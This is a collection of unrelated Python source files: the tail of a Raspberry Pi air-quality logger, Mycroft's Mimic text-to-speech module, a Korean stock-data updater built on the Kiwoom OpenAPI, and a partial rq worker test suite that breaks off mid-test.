time,"+str(V.integration),file=f) #Add data columns print(columns,file=f) else: f=open(ofile,'a') #if already created append to file return f if __name__ == "__main__": #run sensors runsen=V.RUNSEN if V.DHTON=="ON": for DHTN in V.DHTNAMES: runsen.append(DHTN) print(RPI, " Starting in Mode: ",V.MODE, "Sensors:", V.RUNSEN," Time: ", datetime.datetime.now(),"Location:",V.LOC[0]) inter=V.integration#Interval time between readings P=V.RUNPORT R=V.RUNSEN #Array for operational sensors class calls opsen=[] for r in R: if "SDS" in r: opsen.append(sds) #get the processes to run print("Starting AQ RPI, Mode:", V.MODE) print("**************************************************") if V.BLINKT=="ON": print("********************************") print("BLINKT ON") print("integration time (seconds)",inter) print("**************************************************") #processes=[mp.Process(target=c,args=(p,r)) for c,p ,r in zip(opsen,P,R)] #run all the processes if V.OPCON=="ON": Sen=[] for sen, p, r in zip(opsen,P,R): Start=sen(p,r) #initiate the sensors Sen.append(Start) print(r," Ready") print(len(Sen)) time.sleep(4) points=0 #data point longer starttime = datetime.datetime.now() while time.time() % inter != 0: pass print("Looping") while True: #set stars datestart = 
datetime.date.today() #Create file if not alrady created if MODE=="GPS" or MODE=="TEST": #if GPS or a TEST add the time in mins to the file name f=initFile(starttime.strftime('%Y%m%d-%H%M%S'),RPI,FOLDER,LOCATION,R) else: #file name just with date f = initFile(datestart,RPI,FOLDER,LOCATION,R) ts = time.time() tnow = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S') data=tnow if MODE=="GPS": #IF GPS is attahced and turned on, get GPS data lat,lon,alt= Work() print("Lat:",lat,"Lon",lon) data=data+","+str(lat)+","+str(lon)+","+str(alt) if V.DHTON=="ON": #Get DHT data, for all DHT attached for DH, PIN in zip(V.DHTNAMES,V.DHTPINS): HT=DHT() RH, T= HT.getData(DH,PIN) data=data+","+str(RH)+","+str(T) #run through each sensors reading there data if V.OPCON=="ON": for pro, r,p in zip(Sen,R,P): #loop through OPC newdata=pro.getData(p,r) data=data+","+newdata if "spi error" in newdata.lower(): pro=sen(p,r) #initiate the sensors #restate senors in SPI error occres if V.BLINKT=="ON": clear() set_pixel(0,10,10,10) set_pixel(1,10,10,10) show() time.sleep(0.5) PM=float(newdata.split(",")[0]) if "nan" not in str(PM).lower(): #if not nan set color COLOR=0 COLRVAL={0:[0,100,0],1:[0,100,50],2:[100,50,0],3:[100,0,0]} for Limit in V.PMVALUE: if PM>Limit: COLOR=COLOR+1 clear() set_pixel(0,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(1,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(2,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(3,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(4,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(5,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(6,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) set_pixel(7,COLRVAL[COLOR][0],COLRVAL[COLOR][1],COLRVAL[COLOR][2]) show() #printe all data and write it to the file print(data,file=f) points=points+1#add a point to point arraw #prase to csv f.flush() if (datetime.date.today() - datestart).days > 0: #add end info #too do add write point and end time to top data f.close() datestart = datetime.date.today() f = initFile(datestart,RPI,FOLDER,LOCATION,R) secondsToRun = (datetime.datetime.now()-starttime).total_seconds() % inter time.sleep(inter-secondsToRun)
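# Sketch only (an assumption, not part of the original script): the
# sleep-until-next-interval logic used at the bottom of the main loop, factored
# into a helper for clarity. It relies on the module-level time/datetime imports
# and sleeps the remainder of the current interval so readings stay aligned to
# 'inter' seconds from the start time.
def _sleep_to_next_interval(start, inter):
    elapsed = (datetime.datetime.now() - start).total_seconds() % inter
    time.sleep(inter - elapsed)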
mimic_tts.py
# Copyright 2017 Mycroft AI Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os import stat import subprocess from threading import Thread from time import time, sleep import os.path from os.path import exists, join, expanduser from mycroft import MYCROFT_ROOT_PATH from mycroft.api import DeviceApi from mycroft.configuration import Configuration from mycroft.tts import TTS, TTSValidator from mycroft.util.download import download from mycroft.util.log import LOG config = Configuration.get().get("tts").get("mimic") data_dir = expanduser(Configuration.get()['data_dir']) BIN = config.get("path", os.path.join(MYCROFT_ROOT_PATH, 'mimic', 'bin', 'mimic')) if not os.path.isfile(BIN): # Search for mimic on the path import distutils.spawn BIN = distutils.spawn.find_executable("mimic") SUBSCRIBER_VOICES = {'trinity': join(data_dir, 'voices/mimic_tn')} def download_subscriber_voices(selected_voice): """ Function to download all premium voices, starting with the currently selected if applicable """ def make_executable(dest): """ Call back function to make the downloaded file executable. """ LOG.info('Make executable') # make executable st = os.stat(dest) os.chmod(dest, st.st_mode | stat.S_IEXEC) # First download the selected voice if needed voice_file = SUBSCRIBER_VOICES.get(selected_voice) if voice_file is not None and not exists(voice_file): LOG.info('voice doesn\'t exist, downloading') url = DeviceApi().get_subscriber_voice_url(selected_voice) # Check we got an url if url: dl = download(url, voice_file, make_executable) # Wait for completion while not dl.done: sleep(1) else: LOG.debug('{} is not available for this architecture' .format(selected_voice)) # Download the rest of the subsciber voices as needed for voice in SUBSCRIBER_VOICES: voice_file = SUBSCRIBER_VOICES[voice] if not exists(voice_file): url = DeviceApi().get_subscriber_voice_url(voice) # Check we got an url if url: dl = download(url, voice_file, make_executable) # Wait for completion while not dl.done: sleep(1) else: LOG.debug('{} is not available for this architecture' .format(voice)) class Mimic(TTS): def __init__(self, lang, config): super(Mimic, self).__init__( lang, config, MimicValidator(self), 'wav', ssml_tags=["speak", "ssml", "phoneme", "voice", "audio", "prosody"] ) self.dl = None self.clear_cache() # Download subscriber voices if needed self.is_subscriber = DeviceApi().is_subscriber if self.is_subscriber: t = Thread(target=download_subscriber_voices, args=[self.voice]) t.daemon = True t.start() def modify_tag(self, tag): for key, value in [ ('x-slow', '0.4'), ('slow', '0.7'), ('medium', '1.0'), ('high', '1.3'), ('x-high', '1.6'), ('speed', 'rate') ]: tag = tag.replace(key, value) return tag @property def args(self): """ Build mimic arguments. 
""" if (self.voice in SUBSCRIBER_VOICES and exists(SUBSCRIBER_VOICES[self.voice]) and self.is_subscriber): # Use subscriber voice mimic_bin = SUBSCRIBER_VOICES[self.voice] voice = self.voice elif self.voice in SUBSCRIBER_VOICES: # Premium voice but bin doesn't exist, use ap while downloading mimic_bin = BIN voice = 'ap' else: # Normal case use normal binary and selected voice mimic_bin = BIN voice = self.voice args = [mimic_bin, '-voice', voice, '-psdur', '-ssml'] stretch = config.get('duration_stretch', None) if stretch: args += ['--setf', 'duration_stretch=' + stretch] return args def get_tts(self, sentence, wav_file): # Generate WAV and phonemes phonemes = subprocess.check_output(self.args + ['-o', wav_file, '-t', sentence]) return wav_file, phonemes.decode() def visime(self, output): visimes = [] start = time() pairs = str(output).split(" ") for pair in pairs: pho_dur = pair.split(":") # phoneme:duration if len(pho_dur) == 2: visimes.append((VISIMES.get(pho_dur[0], '4'), float(pho_dur[1]))) print(visimes) return visimes class MimicValidator(TTSValidator): def __init__(self, tts): super(MimicValidator, self).__init__(tts) def validate_lang(self): # TODO: Verify version of mimic can handle the requested language pass def validate_connection(self): try: subprocess.call([BIN, '--version']) except: LOG.info("Failed to find mimic at: " + BIN) raise Exception( 'Mimic was not found. Run install-mimic.sh to install it.') def get_tts_class(self): return Mimic # Mapping based on Jeffers phoneme to viseme map, seen in table 1 from: # http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.221.6377&rep=rep1&type=pdf # # Mycroft unit visemes based on images found at: # http://www.web3.lu/wp-content/uploads/2014/09/visemes.jpg # # Mapping was created partially based on the "12 mouth shapes visuals seen at: # https://wolfpaulus.com/journal/software/lipsynchronization/ VISIMES = { # /A group 'v': '5', 'f': '5', # /B group 'uh': '2', 'w': '2', 'uw': '2', 'er': '2', 'r': '2', 'ow': '2', # /C group 'b': '4', 'p': '4', 'm': '4', # /D group 'aw': '1', # /E group 'th': '3', 'dh': '3', # /F group 'zh': '3', 'ch': '3', 'sh': '3', 'jh': '3', # /G group 'oy': '6', 'ao': '6', # /Hgroup 'z': '3', 's': '3', # /I group 'ae': '0', 'eh': '0', 'ey': '0', 'ah': '0', 'ih': '0', 'y': '0', 'iy': '0', 'aa': '0', 'ay': '0', 'ax': '0', 'hh': '0', # /J group 'n': '3', 't': '3', 'd': '3', 'l': '3', # /K group 'g': '3', 'ng': '3', 'k': '3', # blank mouth 'pau': '4', }
updater_short.py
import os import sys import time import sqlite3 import zipfile import pythoncom import pandas as pd from PyQt5 import QtWidgets from PyQt5.QAxContainer import QAxWidget from multiprocessing import Process, Queue, Lock sys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__)))) from login.manuallogin import find_window, manual_login from utility.static import strf_time, now, telegram_msg from utility.setting import openapi_path, sn_brrq, db_day, db_stg app = QtWidgets.QApplication(sys.argv) class UpdaterShort: def __init__(self, gubun, queryQQ, lockk): self.gubun = gubun self.queryQ = queryQQ self.lock = lockk self.str_trname = None self.str_tday = strf_time('%Y%m%d') self.df_tr = None self.dict_tritems = None self.dict_bool = { '로그인': False, 'TR수신': False } self.ocx = QAxWidget('KHOPENAPI.KHOpenAPICtrl.1') self.ocx.OnEventConnect.connect(self.OnEventConnect) self.ocx.OnReceiveTrData.connect(self.OnReceiveTrData) self.Start() def Start(self): self.CommConnect() self.Updater() def CommConnect(self): self.ocx.dynamicCall('CommConnect()') while not self.dict_bool['로그인']: pythoncom.PumpWaitingMessages() def Updater(self): con = sqlite3.connect(db_stg) df = pd.read_sql('SELECT * FROM short', con) con.close() df = df.set_index('index') codes = list(df.index) codes = [code for i, code in enumerate(codes) if i % 4 == self.gubun] count = len(codes) for i, code in enumerate(codes): time.sleep(3.6) self.lock.acquire() df = self.Block_Request('opt10081', 종목코드=code, 기준일자=self.str_tday, 수정주가구분=1, output='주식일봉차트조회', next=0) self.lock.release() df = df.set_index('일자') df = df[::-1] df[['현재가', '시가']] = df[['현재가', '시가']].astype(int).abs() preshort = 1 if df['현재가'][-1] > df['시가'][-1] and df['현재가'][-1] >= df['현재가'][-2] * 1.07 else 0 self.queryQ.put([code, preshort]) print(f'[{now()}] {self.gubun} 데이터 업데이트 중 ... 
[{i + 1}/{count}]') if self.gubun == 3: self.queryQ.put('업데이트완료') sys.exit() def OnEventConnect(self, err_code): if err_code == 0: self.dict_bool['로그인'] = True def OnReceiveTrData(self, screen, rqname, trcode, record, nnext): if screen == '' and record == '': return items = None self.dict_bool['TR다음'] = True if nnext == '2' else False for output in self.dict_tritems['output']: record = list(output.keys())[0] items = list(output.values())[0] if record == self.str_trname: break rows = self.ocx.dynamicCall('GetRepeatCnt(QString, QString)', trcode, rqname) if rows == 0: rows = 1 df2 = [] for row in range(rows): row_data = [] for item in items: data = self.ocx.dynamicCall('GetCommData(QString, QString, int, QString)', trcode, rqname, row, item) row_data.append(data.strip()) df2.append(row_data) df = pd.DataFrame(data=df2, columns=items) self.df_tr = df self.dict_bool['TR수신'] = True def Block_Request(self, *args, **kwargs): trcode = args[0].lower() liness = self.ReadEnc(trcode) self.dict_tritems = self.ParseDat(trcode, liness) self.str_trname = kwargs['output'] nnext = kwargs['next'] for i in kwargs: if i.lower() != 'output' and i.lower() != 'next': self.ocx.dynamicCall('SetInputValue(QString, QString)', i, kwargs[i]) self.dict_bool['TR수신'] = False self.ocx.dynamicCall('CommRqData(QString, QString, int, QString)', self.str_trname, trcode, nnext, sn_brrq) while not self.dict_bool['TR수신']: pythoncom.PumpWaitingMessages() return self.df_tr # noinspection PyMethodMayBeStatic def ReadEnc(self, trcode): enc = zipfile.ZipFile(f'{openapi_path}/data/{trcode}.enc') liness = enc.read(trcode.upper() + '.dat').decode('cp949') return liness # noinspection PyMethodMayBeStatic def ParseDat(self, trcode, liness): liness = liness.split('\n') start = [i for i, x in enumerate(liness) if x.startswith('@START')] end = [i for i, x in enumerate(liness) if x.startswith('@END')] block = zip(start, end) enc_data = {'trcode': trcode, 'input': [], 'output': []} for start, end in block: block_data = liness[start - 1:end + 1] block_info = block_data[0] block_type = 'input' if 'INPUT' in block_info else 'output' record_line = block_data[1] tokens = record_line.split('_')[1].strip() record = tokens.split('=')[0] fields = block_data[2:-1] field_name = [] for line in fields: field = line.split('=')[0].strip() field_name.append(field) fields = {record: field_name} enc_data['input'].append(fields) if block_type == 'input' else enc_data['output'].append(fields) return enc_data class Query: def __init__(self, queryQQ): self.queryQ = queryQQ self.con = sqlite3.connect(db_day) self.Start() def __del__(self): self.con.close() def Start(self): df_short = pd.DataFrame(columns=['preshort']) while True: data = self.queryQ.get() if data != '업데이트완료': df_short.at[data[0]] = data[1] else: break con = sqlite3.connect(db_stg) df = pd.read_sql('SELECT * FROM short', con) df = df.set_index('index') df['preshort'] = df_short['preshort'] df.to_sql('short', con, if_exists='replace', chunksize=1000) con.close() telegram_msg('short DB를 업데이트하였습니다.') sys.exit() if __name__ == '__main__': queryQ = Queue() lock = Lock() login_info = f'{openapi_path}/system/Autologin.dat' if os.path.isfile(login_info): os.remove(f'{openapi_path}/system/Autologin.dat') Process(target=Query, args=(queryQ,)).start() Process(target=UpdaterShort, args=(0, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(1) while find_window('Open API login') != 0: time.sleep(1) Process(target=UpdaterShort, args=(1, queryQ, lock)).start() 
while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(2) while find_window('Open API login') != 0: time.sleep(1) Process(target=UpdaterShort, args=(2, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(3) while find_window('Open API login') != 0: time.sleep(1) Process(target=UpdaterShort, args=(3, queryQ, lock)).start() while find_window('Open API login') == 0: time.sleep(1) time.sleep(5) manual_login(4) while find_window('Open API login') != 0: time.sleep(1)
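# --- illustrative sketch (not part of the script above) -----------------------
# The script above fans work out to four UpdaterShort processes that push rows
# onto a shared multiprocessing.Queue, while a single Query process drains the
# queue and flushes to SQLite once it sees the '업데이트완료' sentinel. A minimal,
# self-contained version of that producer/consumer-with-sentinel pattern is
# sketched below; names (produce, consume, the dummy codes) are assumptions, and
# unlike the original (where the gubun == 3 process sends the sentinel) the
# parent sends it only after joining every producer, which avoids a premature
# shutdown if producers finish out of order.
from multiprocessing import Process, Queue

DONE = '업데이트완료'  # sentinel marking the end of the stream


def produce(gubun, q):
    # each producer handles every 4th item, mirroring `i % 4 == self.gubun`
    codes = [f'{n:06d}' for n in range(20)]
    for i, code in enumerate(codes):
        if i % 4 == gubun:
            q.put((code, i % 2))          # (code, preshort) stand-in row


def consume(q):
    results = {}
    while True:
        item = q.get()
        if item == DONE:                  # stop on the sentinel, then persist
            break
        code, preshort = item
        results[code] = preshort
    print(f'consumed {len(results)} rows')  # stand-in for the SQLite write


if __name__ == '__main__':
    q = Queue()
    consumer = Process(target=consume, args=(q,))
    consumer.start()
    producers = [Process(target=produce, args=(g, q)) for g in range(4)]
    for p in producers:
        p.start()
    for p in producers:
        p.join()
    q.put(DONE)        # signal completion only after every producer is done
    consumer.join()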
test_worker.py
# -*- coding: utf-8 -*- from __future__ import (absolute_import, division, print_function, unicode_literals) import json import os import psutil import shutil import signal import subprocess import sys import time import zlib from datetime import datetime, timedelta, timezone from multiprocessing import Process from time import sleep from unittest import skipIf import redis.exceptions import pytest import mock from mock import Mock from tests import RQTestCase, slow from tests.fixtures import ( access_self, create_file, create_file_after_timeout, create_file_after_timeout_and_setsid, div_by_zero, do_nothing, kill_worker, long_running_job, modify_self, modify_self_and_error, run_dummy_heroku_worker, save_key_ttl, say_hello, say_pid, raise_exc_mock, launch_process_within_worker_and_store_pid ) from rq import Queue, SimpleWorker, Worker, get_current_connection from rq.compat import as_text, PY2 from rq.job import Job, JobStatus, Retry from rq.registry import StartedJobRegistry, FailedJobRegistry, FinishedJobRegistry from rq.suspension import resume, suspend from rq.utils import utcnow from rq.version import VERSION from rq.worker import HerokuWorker, WorkerStatus, RoundRobinWorker, RandomWorker from rq.serializers import JSONSerializer class CustomJob(Job): pass class CustomQueue(Queue): pass class TestWorker(RQTestCase): def test_create_worker(self): """Worker creation using various inputs.""" # With single string argument w = Worker('foo') self.assertEqual(w.queues[0].name, 'foo') # With list of strings w = Worker(['foo', 'bar']) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') self.assertEqual(w.queue_keys(), [w.queues[0].key, w.queues[1].key]) self.assertEqual(w.queue_names(), ['foo', 'bar']) # With iterable of strings w = Worker(iter(['foo', 'bar'])) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # Also accept byte strings in Python 2 if PY2: # With single byte string argument w = Worker(b'foo') self.assertEqual(w.queues[0].name, 'foo') # With list of byte strings w = Worker([b'foo', b'bar']) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With iterable of byte strings w = Worker(iter([b'foo', b'bar'])) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With single Queue w = Worker(Queue('foo')) self.assertEqual(w.queues[0].name, 'foo') # With iterable of Queues w = Worker(iter([Queue('foo'), Queue('bar')])) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With list of Queues w = Worker([Queue('foo'), Queue('bar')]) self.assertEqual(w.queues[0].name, 'foo') self.assertEqual(w.queues[1].name, 'bar') # With string and serializer w = Worker('foo', serializer=json) self.assertEqual(w.queues[0].name, 'foo') # With queue having serializer w = Worker(Queue('foo'), serializer=json) self.assertEqual(w.queues[0].name, 'foo') def test_work_and_quit(self): """Worker processes work, then quits.""" fooq, barq = Queue('foo'), Queue('bar') w = Worker([fooq, barq]) self.assertEqual( w.work(burst=True), False, 'Did not expect any work on the queue.' ) fooq.enqueue(say_hello, name='Frank') self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' 
) def test_work_and_quit_custom_serializer(self): """Worker processes work, then quits.""" fooq, barq = Queue('foo', serializer=JSONSerializer), Queue('bar', serializer=JSONSerializer) w = Worker([fooq, barq], serializer=JSONSerializer) self.assertEqual( w.work(burst=True), False, 'Did not expect any work on the queue.' ) fooq.enqueue(say_hello, name='Frank') self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) def test_worker_all(self): """Worker.all() works properly""" foo_queue = Queue('foo') bar_queue = Queue('bar') w1 = Worker([foo_queue, bar_queue], name='w1') w1.register_birth() w2 = Worker([foo_queue], name='w2') w2.register_birth() self.assertEqual( set(Worker.all(connection=foo_queue.connection)), set([w1, w2]) ) self.assertEqual(set(Worker.all(queue=foo_queue)), set([w1, w2])) self.assertEqual(set(Worker.all(queue=bar_queue)), set([w1])) w1.register_death() w2.register_death() def test_find_by_key(self): """Worker.find_by_key restores queues, state and job_id.""" queues = [Queue('foo'), Queue('bar')] w = Worker(queues) w.register_death() w.register_birth() w.set_state(WorkerStatus.STARTED) worker = Worker.find_by_key(w.key) self.assertEqual(worker.queues, queues) self.assertEqual(worker.get_state(), WorkerStatus.STARTED) self.assertEqual(worker._job_id, None) self.assertTrue(worker.key in Worker.all_keys(worker.connection)) self.assertEqual(worker.version, VERSION) # If worker is gone, its keys should also be removed worker.connection.delete(worker.key) Worker.find_by_key(worker.key) self.assertFalse(worker.key in Worker.all_keys(worker.connection)) self.assertRaises(ValueError, Worker.find_by_key, 'foo') def test_worker_ttl(self): """Worker ttl.""" w = Worker([]) w.register_birth() [worker_key] = self.testconn.smembers(Worker.redis_workers_keys) self.assertIsNotNone(self.testconn.ttl(worker_key)) w.register_death() def test_work_via_string_argument(self): """Worker processes work fed via string arguments.""" q = Queue('foo') w = Worker([q]) job = q.enqueue('tests.fixtures.say_hello', name='Frank') self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) self.assertEqual(job.result, 'Hi there, Frank!') self.assertIsNone(job.worker_name) def test_job_times(self): """job times are set correctly.""" q = Queue('foo') w = Worker([q]) before = utcnow() before = before.replace(microsecond=0) job = q.enqueue(say_hello) self.assertIsNotNone(job.enqueued_at) self.assertIsNone(job.started_at) self.assertIsNone(job.ended_at) self.assertEqual( w.work(burst=True), True, 'Expected at least some work done.' ) self.assertEqual(job.result, 'Hi there, Stranger!') after = utcnow() job.refresh() self.assertTrue( before <= job.enqueued_at <= after, 'Not %s <= %s <= %s' % (before, job.enqueued_at, after) ) self.assertTrue( before <= job.started_at <= after, 'Not %s <= %s <= %s' % (before, job.started_at, after) ) self.assertTrue( before <= job.ended_at <= after, 'Not %s <= %s <= %s' % (before, job.ended_at, after) ) def test_work_is_unreadable(self): """Unreadable jobs are put on the failed job registry.""" q = Queue() self.assertEqual(q.count, 0) # NOTE: We have to fake this enqueueing for this test case. # What we're simulating here is a call to a function that is not # importable from the worker process. 
job = Job.create(func=div_by_zero, args=(3,), origin=q.name) job.save() job_data = job.data invalid_data = job_data.replace(b'div_by_zero', b'nonexisting') assert job_data != invalid_data self.testconn.hset(job.key, 'data', zlib.compress(invalid_data)) # We use the low-level internal function to enqueue any data (bypassing # validity checks) q.push_job_id(job.id) self.assertEqual(q.count, 1) # All set, we're going to process it w = Worker([q]) w.work(burst=True) # should silently pass self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) @mock.patch('rq.worker.logger.error') def test_deserializing_failure_is_handled(self, mock_logger_error): """ Test that exceptions are properly handled for a job that fails to deserialize. """ q = Queue() self.assertEqual(q.count, 0) # as in test_work_is_unreadable(), we create a fake bad job job = Job.create(func=div_by_zero, args=(3,), origin=q.name) job.save() # setting data to b'' ensures that pickling will completely fail job_data = job.data invalid_data = job_data.replace(b'div_by_zero', b'') assert job_data != invalid_data self.testconn.hset(job.key, 'data', zlib.compress(invalid_data)) # We use the low-level internal function to enqueue any data (bypassing # validity checks) q.push_job_id(job.id) self.assertEqual(q.count, 1) # Now we try to run the job... w = Worker([q]) job, queue = w.dequeue_job_and_maintain_ttl(10) w.perform_job(job, queue) # An exception should be logged here at ERROR level self.assertIn("Traceback", mock_logger_error.call_args[0][0]) def test_heartbeat(self): """Heartbeat saves last_heartbeat""" q = Queue() w = Worker([q]) w.register_birth() self.assertEqual(str(w.pid), as_text(self.testconn.hget(w.key, 'pid'))) self.assertEqual(w.hostname, as_text(self.testconn.hget(w.key, 'hostname'))) last_heartbeat = self.testconn.hget(w.key, 'last_heartbeat') self.assertIsNotNone(self.testconn.hget(w.key, 'birth')) self.assertTrue(last_heartbeat is not None) w = Worker.find_by_key(w.key) self.assertIsInstance(w.last_heartbeat, datetime) # worker.refresh() shouldn't fail if last_heartbeat is None # for compatibility reasons self.testconn.hdel(w.key, 'last_heartbeat') w.refresh() # worker.refresh() shouldn't fail if birth is None # for compatibility reasons self.testconn.hdel(w.key, 'birth') w.refresh() @slow def test_heartbeat_survives_lost_connection(self): with mock.patch.object(Worker, 'heartbeat') as mocked: # None -> Heartbeat is first called before the job loop mocked.side_effect = [None, redis.exceptions.ConnectionError()] q = Queue() w = Worker([q]) w.work(burst=True) # First call is prior to job loop, second raises the error, # third is successful, after "recovery" assert mocked.call_count == 3 @slow def test_heartbeat_busy(self): """Periodic heartbeats while horse is busy with long jobs""" q = Queue() w = Worker([q], job_monitoring_interval=5) for timeout, expected_heartbeats in [(2, 0), (7, 1), (12, 2)]: job = q.enqueue(long_running_job, args=(timeout,), job_timeout=30, result_ttl=-1) with mock.patch.object(w, 'heartbeat', wraps=w.heartbeat) as mocked: w.execute_job(job, q) self.assertEqual(mocked.call_count, expected_heartbeats) job = Job.fetch(job.id) self.assertEqual(job.get_status(), JobStatus.FINISHED) def test_work_fails(self): """Failing jobs are put on the failed queue.""" q = Queue() self.assertEqual(q.count, 0) # Action job = q.enqueue(div_by_zero) self.assertEqual(q.count, 1) # keep for later enqueued_at_date = str(job.enqueued_at) w = Worker([q]) 
w.work(burst=True) # Postconditions self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) self.assertEqual(w.get_current_job_id(), None) # Check the job job = Job.fetch(job.id) self.assertEqual(job.origin, q.name) self.assertIsNone(job.worker_name) # Worker name is cleared after failures # Should be the original enqueued_at date, not the date of enqueueing # to the failed queue self.assertEqual(str(job.enqueued_at), enqueued_at_date) self.assertTrue(job.exc_info) # should contain exc_info def test_horse_fails(self): """Tests that job status is set to FAILED even if horse unexpectedly fails""" q = Queue() self.assertEqual(q.count, 0) # Action job = q.enqueue(say_hello) self.assertEqual(q.count, 1) # keep for later enqueued_at_date = str(job.enqueued_at) w = Worker([q]) with mock.patch.object(w, 'perform_job', new_callable=raise_exc_mock): w.work(burst=True) # should silently pass # Postconditions self.assertEqual(q.count, 0) failed_job_registry = FailedJobRegistry(queue=q) self.assertTrue(job in failed_job_registry) self.assertEqual(w.get_current_job_id(), None) # Check the job job = Job.fetch(job.id) self.assertEqual(job.origin, q.name) # Should be the original enqueued_at date, not the date of enqueueing # to the failed queue self.assertEqual(str(job.enqueued_at), enqueued_at_date) self.assertTrue(job.exc_info) # should contain exc_info def test_statistics(self): """Successful and failed job counts are saved properly""" queue = Queue() job = queue.enqueue(div_by_zero) worker = Worker([queue]) worker.register_birth() self.assertEqual(worker.failed_job_count, 0) self.assertEqual(worker.successful_job_count, 0) self.assertEqual(worker.total_working_time, 0) registry = StartedJobRegistry(connection=worker.connection) job.started_at = utcnow() job.ended_at = job.started_at + timedelta(seconds=0.75) worker.handle_job_failure(job, queue) worker.handle_job_success(job, queue, registry) worker.refresh() self.assertEqual(worker.failed_job_count, 1) self.assertEqual(worker.successful_job_count, 1) self.assertEqual(worker.total_working_time, 1.5) # 1.5 seconds worker.handle_job_failure(job, queue) worker.handle_job_success(job, queue, registry) worker.refresh() self.assertEqual(worker.failed_job_count, 2) self.assertEqual(worker.successful_job_count, 2) self.assertEqual(worker.total_working_time, 3.0) def test_handle_retry(self): """handle_job_failure() handles retry properly""" connection = self.testconn queue = Queue(connection=connection) retry = Retry(max=2) job = queue.enqueue(div_by_zero, retry=retry) registry = FailedJobRegistry(queue=queue) worker = Worker([queue]) # If job if configured to retry, it will be put back in the queue # and not put in the FailedJobRegistry. 
# This is the original execution queue.empty() worker.handle_job_failure(job, queue) job.refresh() self.assertEqual(job.retries_left, 1) self.assertEqual([job.id], queue.job_ids) self.assertFalse(job in registry) # First retry queue.empty() worker.handle_job_failure(job, queue) job.refresh() self.assertEqual(job.retries_left, 0) self.assertEqual([job.id], queue.job_ids) # Second retry queue.empty() worker.handle_job_failure(job, queue) job.refresh() self.assertEqual(job.retries_left, 0) self.assertEqual([], queue.job_ids) # If a job is no longer retries, it's put in FailedJobRegistry self.assertTrue(job in registry) def test_total_working_time(self): """worker.total_working_time is stored properly""" queue = Queue() job = queue.enqueue(long_running_job, 0.05) worker = Worker([queue]) worker.register_birth() worker.perform_job(job, queue) worker.refresh() # total_working_time should be a little bit more than 0.05 seconds self.assertGreaterEqual(worker.total_working_time, 0.05) # in multi-user environments delays might be unpredictable, # please adjust this magic limit accordingly in case if It takes even longer to run self.assertLess(worker.total_working_time, 1) def test_max_jobs(self): """Worker exits after number of jobs complete.""" queue = Queue() job1 = queue.enqueue(do_nothing) job2 = queue.enqueue(do_nothing) worker = Worker([queue]) worker.work(max_jobs=1) self.assertEqual(JobStatus.FINISHED, job1.get_status()) self.assertEqual(JobStatus.QUEUED, job2.get_status()) def test_disable_default_exception_handler(self): """ Job is not moved to FailedJobRegistry when default custom exception handler is disabled. """ queue = Queue(name='default', connection=self.testconn) job = queue.enqueue(div_by_zero) worker = Worker([queue], disable_default_exception_handler=False) worker.work(burst=True) registry = FailedJobRegistry(queue=queue) self.assertTrue(job in registry) # Job is not added to FailedJobRegistry if # disable_default_exception_handler is True job = queue.enqueue(div_by_zero) worker = Worker([queue], disable_default_exception_handler=True) worker.work(burst=True) self.assertFalse(job in registry) def test_custom_exc_handling(self): """Custom exception handling.""" def first_handler(job, *exc_info): job.meta = {'first_handler': True} job.save_meta() return True def second_handler(job, *exc_info): job.meta.update({'second_handler': True}) job.save_meta() def black_hole(job, *exc_info): # Don't fall through to default behaviour (moving to failed queue) return False q = Queue() self.assertEqual(q.count, 0) job = q.enqueue(div_by_zero) w = Worker([q], exception_handlers=first_handler) w.work(burst=True) # Check the job job.refresh() self.assertEqual(job.is_failed, True) self.assertTrue(job.meta['first_handler']) job = q.enqueue(div_by_zero) w = Worker([q], exception_handlers=[first_handler, second_handler]) w.work(burst=True) # Both custom exception handlers are run job.refresh() self.assertEqual(job.is_failed, True) self.assertTrue(job.meta['first_handler']) self.assertTrue(job.meta['second_handler']) job = q.enqueue(div_by_zero) w = Worker([q], exception_handlers=[first_handler, black_hole, second_handler]) w.work(burst=True) # second_handler is not run since it's interrupted by black_hole job.refresh() self.assertEqual(job.is_failed, True) self.assertTrue(job.meta['first_handler']) self.assertEqual(job.meta.get('second_handler'), None) def test_cancelled_jobs_arent_executed(self): """Cancelling jobs.""" SENTINEL_FILE = '/tmp/rq-tests.txt' # noqa try: # Remove the sentinel if it is 
